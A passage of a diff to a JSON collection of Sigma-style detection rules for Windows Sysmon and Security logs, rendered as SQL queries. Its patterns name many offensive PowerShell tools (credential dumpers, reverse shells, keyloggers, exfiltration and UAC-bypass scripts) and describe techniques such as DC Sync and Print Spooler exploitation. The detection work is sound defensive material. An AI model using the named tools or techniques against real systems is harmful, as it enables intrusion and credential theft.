ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-System.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-TimedScreenshot.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-UnattendedInstallFile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-Unconstrained.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-USBKeystrokes.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VaultCredential.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnAutoRun.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-VulnSchTask.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebConfig.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WebCredentials.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Get-WLAN-Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Gupt-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\HTTP-Login.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Install-ServiceBinary.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Install-SSP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ACLScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ADSBackdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-AmsiBypass.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ARPScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BackdoorLNK.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BadPotato.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BetterSafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BruteForce.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-BypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Carbuncle.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Certify.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ConPtyShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-CredentialsPhish.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DAFT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DCSync.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Decode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DinvokeKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DllInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-DowngradeAccount.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EgressCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Encode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-EventViewer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Eyewitness.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-FakeLogonScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Farmer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Get-RBCD-Threaded.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Gopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Grouper2.ps1' ESCAPE '\\' OR TargetFilename LIKE 
'%\\\\Invoke-Grouper3.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-HandleKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Interceptor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Internalmonologue.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Inveigh.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-InveighRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRegsvr.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-JSRatRundll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-KrbRelayUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-LdapSignCheck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Lockless.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MalSCCM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MimikatzWDigestDowngrade.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Mimikittenz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-MITM6.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NanoDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetRipper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NetworkRelay.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-NinjaCopy.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-OxidResolver.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-P0wnedshellx86.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Paranoia.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PortScan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PoshRatHttps.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PostExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellIcmp.ps1' ESCAPE '\\' OR TargetFilename 
LIKE '%\\\\Invoke-PowerShellTCP.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellTcpOneLineBind.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellUdpOneLine.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerShellWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PowerThIEf.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PPLDump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Prasadhak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsGcatAgent.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PSInject.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-PsUaCme.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReflectivePEInjection.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ReverseDNSLookup.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Rubeus.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-RunAs.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SafetyKatz.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SauronEye.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SCShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Seatbelt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ServiceAbuse.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SessionGopher.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ShellCode.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SMBScanner.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Snaffler.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Spoolsample.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSHCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-SSIDExfil.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-StandIn.ps1' ESCAPE '\\' OR 
TargetFilename LIKE '%\\\\Invoke-StickyNotesExtract.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tater.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Thunderfox.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-ThunderStruck.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TokenManipulation.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Tokenvator.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-TotalExec.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UrbanBishop.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-UserHunter.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-VoiceTroll.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Whisker.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WinEnum.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-winPEAS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WireTap.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WmiCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-WScriptBypassUAC.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Invoke-Zerologon.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Keylogger.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\MailRaider.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\New-HoneyHash.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\OfficeMemScraper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Offline\\_Winpwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-CHM.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-DnsTxt.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Excel.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-HTA.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Java.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-JS.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Minidump.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-RundllCommand.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCF.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-SCT.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Shortcut.ps1' 
ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-WebQuery.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Out-Word.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Parse\\_Keys.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Port-Scan.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerBreach.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\powercat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerRunAsSystem.psm1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerSharpPack.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUp.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerUpSQL.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerView.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PSAsyncShell.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\RemoteHashRetrieval.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Persistence.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-PoshRat.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Remove-Update.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Run-EXEonRemote.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Schtasks-Backdoor.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-DCShadowPermissions.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-MacAttribute.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemotePSRemoting.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-RemoteWMI.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Set-Wallpaper.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Show-TargetScreen.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Speak.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-CaptureServer.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Start-WebcamRecorder.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\StringToBase64.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\TexttoExe.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\VolumeShadowCopyTools.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinPwn.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WSUSpendu.ps1' ESCAPE '\\') OR (TargetFilename LIKE '%Invoke-Sharp%' ESCAPE '\\' 
AND TargetFilename LIKE '%.ps1' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4825')" ], - "filename": "file_event_win_powershell_exploit_scripts.yml" + "filename": "win_security_not_allowed_rdp_access.yml" }, { - "title": "UAC Bypass Using IDiagnostic Profile - File", - "id": "48ea844d-19b1-4642-944e-fe39c2cc1fec", - "status": "experimental", - "description": "Detects the creation of a file by \"dllhost.exe\" in System32 directory part of \"IDiagnosticProfileUAC\" UAC bypass technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Local User Creation", + "id": "66b6be3d-55d0-4f47-9855-d69df21740ea", + "status": "test", + "description": "Detects local user creation on windows servers, which shouldn't happen in an Active Directory environment. Apply this Sigma Use Case on your windows server logs and not on your DC logs.", + "author": "Patrick Bareiss", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.persistence", + "attack.t1136.001" ], "falsepositives": [ - "Unknown" + "Domain Controller Logs", + "Local accounts managed by privileged account management tools" ], - "level": "high", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720')" ], - "filename": "file_event_win_uac_bypass_idiagnostic_profile.yml" + "filename": "win_security_user_creation.yml" }, { - "title": "Potential Winnti Dropper Activity", - "id": "130c9e58-28ac-4f83-8574-0a4cc913b97e", + "title": "First Time Seen Remote Named Pipe", + "id": "52d8b0c6-53d6-439a-9e41-52ad442ad9ad", "status": "test", - "description": "Detects files dropped by Winnti as described in 
RedMimicry Winnti playbook", - "author": "Alexander Rausch", + "description": "This detection excludes known namped pipes accessible remotely and notify on newly observed ones, may help to detect lateral movement and remote exec using named pipes", + "author": "Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Unknown" + "Update the excluded named pipe to filter out any newly observed legit named pipe" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\gthread-3.6.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\sigcmm-2.4.dll' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\Temp\\\\tmp.bat' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\') AND NOT ((RelativeTargetName LIKE 'atsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'samr' ESCAPE '\\' OR RelativeTargetName LIKE 'lsarpc' ESCAPE '\\' OR RelativeTargetName LIKE 'lsass' ESCAPE '\\' OR RelativeTargetName LIKE 'winreg' ESCAPE '\\' OR RelativeTargetName LIKE 'netlogon' ESCAPE '\\' OR RelativeTargetName LIKE 'srvsvc' ESCAPE '\\' OR RelativeTargetName LIKE 'protected\\_storage' ESCAPE '\\' OR RelativeTargetName LIKE 'wkssvc' ESCAPE '\\' OR RelativeTargetName LIKE 'browser' ESCAPE '\\' OR RelativeTargetName LIKE 'netdfs' ESCAPE '\\' OR RelativeTargetName LIKE 'svcctl' ESCAPE '\\' OR RelativeTargetName LIKE 'spoolss' ESCAPE '\\' OR RelativeTargetName LIKE 'ntsvcs' ESCAPE '\\' OR RelativeTargetName LIKE 'LSM\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'HydraLsPipe' ESCAPE '\\' OR RelativeTargetName LIKE 'TermSrv\\_API\\_service' ESCAPE '\\' OR RelativeTargetName LIKE 'MsFteWds' ESCAPE '\\' OR RelativeTargetName LIKE 'sql\\\\query' ESCAPE '\\' OR RelativeTargetName LIKE 'eventlog' ESCAPE '\\')))" ], - "filename": 
"file_event_win_redmimicry_winnti_filedrop.yml" + "filename": "win_security_lm_namedpipe.yml" }, { - "title": "WScript or CScript Dropper - File", - "id": "002bdb95-0cf1-46a6-9e08-d38c128a6127", - "status": "experimental", - "description": "Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe", - "author": "Tim Shelton", + "title": "Suspicious LDAP-Attributes Used", + "id": "d00a9a72-2c09-4459-ad03-5e0a23351e36", + "status": "test", + "description": "Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.", + "author": "xknow @xknow_infosec", + "tags": [ + "attack.t1001.003", + "attack.command_and_control" + ], "falsepositives": [ - "Unknown" + "Companies, who may use these default LDAP-Attributes for personal information" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' OR TargetFilename LIKE 'C:\\\\ProgramData%' ESCAPE '\\') AND (TargetFilename LIKE '%.jse' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.js' ESCAPE '\\' OR TargetFilename LIKE '%.vba' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5136' AND AttributeValue LIKE '%' ESCAPE '\\' AND AttributeLDAPDisplayName IN ('primaryInternationalISDNNumber', 'otherFacsimileTelephoneNumber', 'primaryTelexNumber'))" ], - "filename": "file_event_win_cscript_wscript_dropper.yml" + "filename": "win_security_susp_ldap_dataexchange.yml" }, { - "title": "Potential Persistence Via Notepad++ Plugins", - "id": "54127bd4-f541-4ac3-afdb-ea073f63f692", - "status": "experimental", - "description": "Detects creation of new \".dll\" files inside 
the plugins directory of a notepad++ installation by a process other than \"gup.exe\". Which could indicates possible persistence", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Hacktool Ruler", + "id": "24549159-ac1b-479c-8175-d42aea947cae", + "status": "test", + "description": "This events that are generated when using the hacktool Ruler by Sensepost", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence" + "attack.discovery", + "attack.execution", + "attack.t1087", + "attack.t1114", + "attack.t1059", + "attack.t1550.002" ], "falsepositives": [ - "Possible FPs during first installation of Notepad++", - "Legitimate use of custom plugins by users in order to enhance notepad++ functionalities" + "Go utilities that use staaldraad awesome NTLM library" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Notepad++\\\\plugins\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\Notepad++\\\\updater\\\\gup.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\target.exe' ESCAPE '\\' OR Image LIKE '%Installer.x64.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4776' AND Workstation = 'RULER') OR (EventID IN ('4624', '4625') AND WorkstationName = 'RULER')))" ], - "filename": "file_event_win_notepad_plus_plus_persistence.yml" + "filename": "win_security_alert_ruler.yml" }, { - "title": "PSEXEC Remote Execution File Artefact", - "id": "304afd73-55a5-4bb9-8c21-0b1fc84ea9e4", + "title": "CVE-2021-1675 Print Spooler Exploitation IPC Access", + "id": "8fe1c584-ee61-444b-be21-e9054b229694", "status": "experimental", - "description": "Detects creation of the PSEXEC key file. Which is created anytime a PsExec command is executed. 
It gets written to the file system and will be recorded in the USN Journal on the target system", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527", + "author": "INIT_6", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", "attack.execution", - "attack.persistence", - "attack.t1136.002", - "attack.t1543.003", - "attack.t1570", - "attack.s0029" + "attack.t1569", + "cve.2021.1675", + "cve.2021.34527" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\PSEXEC-%' ESCAPE '\\' AND TargetFilename LIKE '%.key' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\IPC$' ESCAPE '\\' AND RelativeTargetName = 'spoolss' AND AccessMask = '0x3' AND ObjectType = 'File')" ], - "filename": "file_event_win_psexec_service_key.yml" + "filename": "win_security_exploit_cve_2021_1675_printspooler_security.yml" }, { - "title": "Suspicious VHD Image Download From Browser", - "id": "8468111a-ef07-4654-903b-b863a80bbc95", + "title": "Disabling Windows Event Auditing", + "id": "69aeb277-f15f-4d2d-b32a-55e883609563", "status": "test", - "description": "Malware can use mountable Virtual Hard Disk .vhd file to encapsulate payloads and evade security controls", - "author": "frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", + "description": "Detects scenarios where system auditing (ie: windows event log auditing) is disabled.\nThis may be used in a scenario where an entity would want to bypass local logging to evade detection when windows event logging is enabled and reviewed.\nAlso, it 
is recommended to turn off \"Local Group Policy Object Processing\" via GPO, which will make sure that Active Directory GPOs take precedence over local/edited computer policies via something such as \"gpedit.msc\".\nPlease note, that disabling \"Local Group Policy Object Processing\" may cause an issue in scenarios of one off specific GPO modifications -- however it is recommended to perform these modifications in Active Directory anyways.\n", + "author": "@neu5ron", "tags": [ - "attack.resource_development", - "attack.t1587.001" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ - "Legitimate user creation" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\microsoftedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\microsoftedgecp.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\') AND TargetFilename LIKE '%.vhd%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4719' AND (AuditPolicyChanges LIKE '%\\%\\%8448%' ESCAPE '\\' OR AuditPolicyChanges LIKE '%\\%\\%8450%' ESCAPE '\\'))" ], - "filename": "file_event_win_mal_vhd_download.yml" + "filename": "win_security_disable_event_logging.yml" }, { - "title": "PCRE.NET Package Temp Files", - "id": "6e90ae7a-7cd3-473f-a035-4ebb72d961da", + "title": "RottenPotato Like Attack Pattern", + "id": "16f5d8ca-44bd-47c8-acbe-6fc95a16c12f", "status": "test", - "description": "Detects processes creating temp files related to PCRE.NET package", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects logon events that have characteristics of events generated during an attack with 
RottenPotato and the like", + "author": "@SBousseaden, Florian Roth", "tags": [ - "attack.execution", - "attack.t1059" + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1557.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '3' AND TargetUserName = 'ANONYMOUS LOGON' AND WorkstationName = '-' AND IpAddress IN ('127.0.0.1', '::1'))" ], - "filename": "file_event_win_pcre_net_temp_file.yml" + "filename": "win_security_susp_rottenpotato.yml" }, { - "title": "Moriya Rootkit", - "id": "a1507d71-0b60-44f6-b17c-bf53220fdd88", - "status": "test", - "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", - "author": "Bhabesh Raj", - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" - ], + "title": "Add or Remove Computer from DC", + "id": "20d96d95-5a20-4cf1-a483-f3bda8a7c037", + "status": "experimental", + "description": "Detects the creation or removal of a computer. 
Can be used to detect attacks such as DCShadow via the creation of a new SPN.", + "author": "frack113", "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\drivers\\\\MoriyaStreamWatchmen.sys' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4741', '4743'))" ], - "filename": "file_event_win_moriya_rootkit.yml" + "filename": "win_security_add_remove_computer.yml" }, { - "title": "Drop Binaries Into Spool Drivers Color Folder", - "id": "ce7066a6-508a-42d3-995b-2952c65dc2ce", + "title": "Mimikatz DC Sync", + "id": "611eab06-a145-4dfa-a295-3ccc5c20f59a", "status": "experimental", - "description": "Detects the creation of suspcious binary files inside the \"\\windows\\system32\\spool\\drivers\\color\\\" as seen in the blog referenced below", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects Mimikatz DC sync security events", + "author": "Benjamin Delpy, Florian Roth (Nextron Systems), Scott Dermott, Sorina Ionescu", "tags": [ - "attack.defense_evasion" + "attack.credential_access", + "attack.s0002", + "attack.t1003.006" ], "falsepositives": [ - "Unknown" + "Valid DC Sync that is not covered by the filters; please report", + "Local Domain Admin account used for Azure AD Connect" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\color\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\' OR TargetFilename LIKE '%.sys' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4662' AND (Properties LIKE '%Replicating Directory Changes 